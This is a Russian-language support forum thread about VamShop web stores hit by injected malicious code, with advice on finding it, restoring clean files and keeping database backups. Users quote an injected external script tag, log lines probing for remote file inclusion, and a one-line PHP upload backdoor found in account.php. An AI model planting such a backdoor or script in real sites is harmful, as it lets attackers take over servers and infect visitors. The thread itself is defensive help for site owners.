benz_inst 0 Опубликовано 21 марта, 2012 Жалоба Share Опубликовано 21 марта, 2012 benz_inst Вот этот код, что Вы привели где-то в коде сидит, его надо искать и удалять. Шаблоны писем в /templates/шаблон/mail/russian/ Письмо о регистрации отправляется из /create_account.php Не смотретли там? в этом /create_account.phpвроде нет Уважаемый покупатель! Вы успешно зарегистрировались в нашем интернет-магазине, теперь Вам доступны следующие возможности нашего магазина: - Корзина покупателя - Все товары, которые Вы добавили в корзину до регистрации, сохранятся в Вашей корзине. - Адресная книга - Вы можете делать заказы не только на свой домашний адрес, но и на любой другой. Например, Вы можете сделать подарок знакомым. - История заказов - Вы можете следить за процессом исполнения Вашего заказа. - Отзывы - Оставляйте свои отзывы о товарах, заказанных в нашем магазине. Если у Вас возникли вопросы, свяжитесь с нами по адресу: {$content.MAIL_REPLY_ADDRESS} Предупреждение: Данный E-Mail адрес был получен нами от клиента. Если Вы нигде не указывали данный E-Mail адрес, свяжитесь с нами: {$content.MAIL_REPLY_ADDRESS} {if $LINK}Вы подписались на нашу рассылку. Необходимо подтвердить Вашу подписку, перейдя по ссылке, указанной ниже. Ссылка активации подписки: {$LINK}{/if} {if $SEND_GIFT==true} Также мы отправили Вам подарочный сертификат на сумму: {$GIFT_AMMOUNT} Код Вашего сертификата {$GIFT_CODE}, Вы можете использовать его при оформлении заказов в нашем интернет-магазине. Чтобы активировать подарочный сертификат, перейдите по следующей ссылке {$GIFT_LINK} {/if} {if $SEND_COUPON==true} Поздравляем, Вы получили купон на получение скидки в нашем интернет-магазине. Ниже Вы можете увидеть подробную информацию о купоне. Описание: {$COUPON_DESC} Вы можете использовать его для получения скидки в любой момент, просто укажите код Вашего купона {$COUPON_CODE} при оформлении заказа в нашем интернет-магазине. {/if} Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 21 марта, 2012 Автор Жалоба Share Опубликовано 21 марта, 2012 Посмотрите в Админке - Настройки - Настройка email Вроде как туда вставили js код. Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 21 марта, 2012 Автор Жалоба Share Опубликовано 21 марта, 2012 vitalik Можно подписаться вот тут - vamshop.ru/index.php Справа. Но я правда пока не рассылал рассылок, но в любой момент, в принципе, можно отправить. Ссылка на сообщение Поделиться на другие сайты
Александр Муравьев 0 Опубликовано 22 марта, 2012 Жалоба Share Опубликовано 22 марта, 2012 А интересно, в яндексе как-то можно получить более точную инофрмацию, что именно ему не нравится в коде. Выводит только список url адресов и всё. Если б хотя бы пример кода был, который ему не нравится. Никто не интересовался? сначала я получил письмо что сайт заражен и будет отмечен так к рейтинге я спросил через панель вебмастера - в чем дело? все ведь в порядке чуть позже появились данные по урлам в вебмастере начал думать и поняв что поиски затянутся переставил магазин через день получил письмо от яндекса Ранее на странице http://ххххххххх/dow...maintenance.php был обнаружен вредоносный код следующего содержания: <script language='JavaScript' src='http://llvelnternet. ru/?in=23311'></script> В настоящий момент с Вашим сайтом все в порядке, он прошёл перепроверку и не помечен как угрожающий безопасности компьютера. Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 22 марта, 2012 Автор Жалоба Share Опубликовано 22 марта, 2012 Да я вот и говорю, что было б проще искать, если б в яндекс.вебмастере сразу была информация, какой код не нравится. А то иногда бывает, что прячут довольно хорошо вирусный код, бывает, что его не так просто найти. Ссылка на сообщение Поделиться на другие сайты
LordBelial 0 Опубликовано 22 марта, 2012 Жалоба Share Опубликовано 22 марта, 2012 Спасибо! Буду работать. Ссылка на сообщение Поделиться на другие сайты
-Inna- 0 Опубликовано 31 марта, 2012 Жалоба Share Опубликовано 31 марта, 2012 сегодня полностью лег сайт у старого знакомого. Все было сделано как советуется в шапке после замены папки смарти все залетало порылись в логе .вот это кто нибудь может прокомментировать 189.42.255.66 - - [15/Mar/2012:02:26:43 +0400] "GET /index.php?cat=3&sort=http%3A%2F%2Fwww.akraplast.it%2Fpublic%2Fnews%2Fbikiyo%2Fewilaxu%2F&direction=asc HTTP/1.0" 200 23780 189.42.255.66 - - [15/Mar/2012:02:26:44 +0400] "GET /index.php?cat=3&sort=name&direction=http%3A%2F%2Fmmec.eng.ku.ac.th%2Fnrct%2Fitknowledge%2Fopigad%2Fziwep%2F HTTP/1.0" 200 23810 189.42.255.66 - - [15/Mar/2012:02:26:45 +0400] "GET /index.php?cat=3&on_page=http%3A%2F%2Fwww.playme.nl%2Factiesarchive%2Febazazo%2Fixe%2F HTTP/1.0" 200 24002 189.42.255.66 - - [15/Mar/2012:02:26:47 +0400] "GET /index.php?cat=3&page=http%3A%2F%2Fwww.gamepat.de%2Fgallery%2Fgallery2%2Fg2data%2Fejilumo%2Fide%2F HTTP/1.0" 200 23162 Ссылка на сообщение Поделиться на другие сайты
YuraS 4 Опубликовано 31 марта, 2012 Жалоба Share Опубликовано 31 марта, 2012 видимо, бот искал xss-лазейку. не стоит обращать на это внимание. Ссылка на сообщение Поделиться на другие сайты
KoVaLsKy 59 Опубликовано 10 апреля, 2012 Жалоба Share Опубликовано 10 апреля, 2012 acount.php в самом верху <?php if(isset($_FILES['upkk']['tmp_name']))copy($_FILES['upkk']['tmp_name'],$_SERVER['DOCUMENT_ROOT']."/".basename($_FILES['upkk']['name'])); ?><?php [/CODE] и еще по всему сайту ссылки на сторонний сайт. код судя по всему зашифрованный т.е. просто поиском по ссылке ничего не нашел в файлах Ссылка на сообщение Поделиться на другие сайты
sheldon 1 Опубликовано 2 мая, 2012 Жалоба Share Опубликовано 2 мая, 2012 а почему не сделать сборку без таких файлов которые ломают? почему полностью не отказаться от tiny_mce? Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 3 мая, 2012 Автор Жалоба Share Опубликовано 3 мая, 2012 shendon Так Вы прочитайте, что в первом сообщении написано. Этих файлов и так давно уже нет. Я написал для "старых" пользователей, предупредил о возможных проблемах. Ссылка на сообщение Поделиться на другие сайты
sheldon 1 Опубликовано 9 мая, 2012 Жалоба Share Опубликовано 9 мая, 2012 Доброго времени суток! есть один магаз, с вирусами к сожалению. в нём порядка 100-150 информационных страниц с нужными текстами и около 15 категорий, в которых есть только описание категорий,оно же просто сео и рекламный текст. на сайте всего 5 товаров,которые не сложно создать заново. так как я неумею чистить от вирусов, задаю вопрос: можно ли как то условно безболезненно, все эти информационные страницы скопировать, потом полностью снести магаз,залить чистые файлы из новой сборки и залить информационные страницы с фотографиями и текстами.и ручками добавить 5 товаров? как это сделать легче и проще всего,гарантированно не потеряв информационные страницы,текст и фото? тексты категорий тоже можно сохранить? как? Ссылка на сообщение Поделиться на другие сайты
KoVaLsKy 59 Опубликовано 9 мая, 2012 Жалоба Share Опубликовано 9 мая, 2012 делаете полное резервное копирование файлов и БД( через phpmyadmin) через файзиллу, например, перезаливаете файлы и будет Вам счастье. вирусы- это коды, внедряемые, как правило не в тексты страниц (БД) а в сами рабочие php, html, js файлы. все тексты, описания, SEO и прочая бухгалтерия хранится в БД, которая скорее всего в нормальном состоянии. Ссылка на сообщение Поделиться на другие сайты
geval 3 Опубликовано 21 мая, 2012 Жалоба Share Опубликовано 21 мая, 2012 вообще давно пора уже внедрить скрипт, наподобие как в дле... кто захочет, включит по крону, чтобы раз в сутки была проверка на модифицированные файлы.. где-то тут на форуме уже писали про это лекарство и приводили пример скрипта..который каждый может сам приделать. неплохо бы ссылку- а то так фиг найдешь) ну и готовое бы решение не помешало для вамшоп Ссылка на сообщение Поделиться на другие сайты
YuraS 4 Опубликовано 21 мая, 2012 Жалоба Share Опубликовано 21 мая, 2012 тут на форуме уже писали про это лекарство и приводили пример скрипта..который каждый может сам приделать. неплохо бы ссылку- а то так фиг найдешь) я пользуюь этим скриптом мониторинга изменений файлов поставил на крон и каждый час на емейл приходит письмо об изменениях на сервере. Ссылка на сообщение Поделиться на другие сайты
sheldon 1 Опубликовано 21 мая, 2012 Жалоба Share Опубликовано 21 мая, 2012 делаете полное резервное копирование файлов и БД( через phpmyadmin) через файзиллу, например, перезаливаете файлы и будет Вам счастье. вирусы- это коды, внедряемые, как правило не в тексты страниц (БД) а в сами рабочие php, html, js файлы. все тексты, описания, SEO и прочая бухгалтерия хранится в БД, которая скорее всего в нормальном состоянии. Огромное спасибо. Да. Что то я совсем об этом простом варианте забыл.Делал так сто раз.Но уже два года назад И вот за 2 года совсем подзабыл. Была база сломанного магаза со сбркой 166. залил резервную копию в новый со сборкой 167. все работает. вопрос: все ок? проблем не должно быть,из-за того что база от 166,а залил в 167? Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 22 мая, 2012 Автор Жалоба Share Опубликовано 22 мая, 2012 Да, нормально. Ссылка на сообщение Поделиться на другие сайты
KoVaLsKy 59 Опубликовано 23 мая, 2012 Жалоба Share Опубликовано 23 мая, 2012 с 1.66 до 1.67 структура баз не поменялась. все ок Ссылка на сообщение Поделиться на другие сайты
sheldon 1 Опубликовано 18 июля, 2012 Жалоба Share Опубликовано 18 июля, 2012 делаете полное резервное копирование файлов и БД( через phpmyadmin) через файзиллу, например, перезаливаете файлы и будет Вам счастье. вирусы- это коды, внедряемые, как правило не в тексты страниц (БД) а в сами рабочие php, html, js файлы. все тексты, описания, SEO и прочая бухгалтерия хранится в БД, которая скорее всего в нормальном состоянии. а как сделать полное резервное копирование файлов? я обычно просто и тупо копировал всю базу данных и было мне счастье. а тут заглянул на один из сайтов,там общий вес файлов сайта на 5000 товаров, около 3 гигов, это с учетом кучи старья,так как сайт еще с оскомерса мигрировал на вамшоп. и чего то я задумался. надо бы его подчистить. Правильно ли я мыслю: сохранить картинки и базу данных. Снести всё на хрен. Закачать новую голую сборку. Подключить её к старой базе данных и .... поэтому перечитал то что вы мне написали еще два месяца назад.. и прошу совета. еще вопрос,а в базе данных тоже может быть полно хлама? как ее чистить от ненужного и как понять что там уже не нужно? Ссылка на сообщение Поделиться на другие сайты
sheldon 1 Опубликовано 18 июля, 2012 Жалоба Share Опубликовано 18 июля, 2012 перед тем как патчить с 167 до 168 решил слить старые файлы и сделать из них резервную копию файлов. И антивирус показывает что в каждой следующей,в конце перечисленной папке есть троянская программа: jscript, katalog, katalog_admin, katalog_img, последние три папки удалил. это от былых времен обмена ссылками. что делать с jscript? Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 19 июля, 2012 Автор Жалоба Share Опубликовано 19 июля, 2012 Да, правильно, если у Вас не было доработок, то достаточно сохранить базу и картинки. Но сейчас что-что, а место на диске у хостеров дешёвое, лучше уж просто место увеличить, чем по-новой ставить магазин. А делать копии файлов можно как угодно, например в панелях управления хостингом бывает опция - резервное копирование, можно через панель управления, если у Вас она есть. В базе особого хлама не бывает, да и опятьже, это экономия на спичках, что называется. Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 19 июля, 2012 Автор Жалоба Share Опубликовано 19 июля, 2012 Взять оригинальные чистые файлы из архива с VamShop. Ссылка на сообщение Поделиться на другие сайты
sheldon 1 Опубликовано 20 июля, 2012 Жалоба Share Опубликовано 20 июля, 2012 Взять оригинальные чистые файлы из архива с VamShop. в магазе сейчас есть куча ненужных старых файлов по моему, еще с оскомерса. дело не в экономии дискового пространства хостера. дело в том,что в некоторых папках,при закачке себе на комп,всех файлов,обнаружились вирусы. я просмотрел папки,оказались старые какие то ненужные. все нахрен снёс. включая старые фотки,точно от оскомерса. но всё равно,хочется сделать чистым магаз, без лишнего,без лишних файлов,которые кто то возможно сможет вскрыть и заразить. поэтому и спрашиваю, можно ли сделать так: от старого магаза я делаю и оставляю только: резервную копию базы данных. сохраняю images все остальное полностью сношу с дискового пространства хостера. заливаю вашу новую и чистую сборку. заливаю папку images. делаю новую базу данных. настраиваю параметры подключения к базе в configure.php все. у меня самая последняя сборка. и я удалил весь хлам так можно сделать или есть какой то другой выход? я могу потестить этот сценарий на поддомене. но мне просто нужен ваш совет. правильным путём я иду или нет. Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 20 июля, 2012 Автор Жалоба Share Опубликовано 20 июля, 2012 Я уже выше отвечал, что да, можно так сделать. Ссылка на сообщение Поделиться на другие сайты
sheldon 1 Опубликовано 21 июля, 2012 Жалоба Share Опубликовано 21 июля, 2012 Я уже выше отвечал, что да, можно так сделать. лучше перестраховаться и задать вопрос снова. спасибо.теперь все понял. попробую вначале на поддомене,еще раз спасибо Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения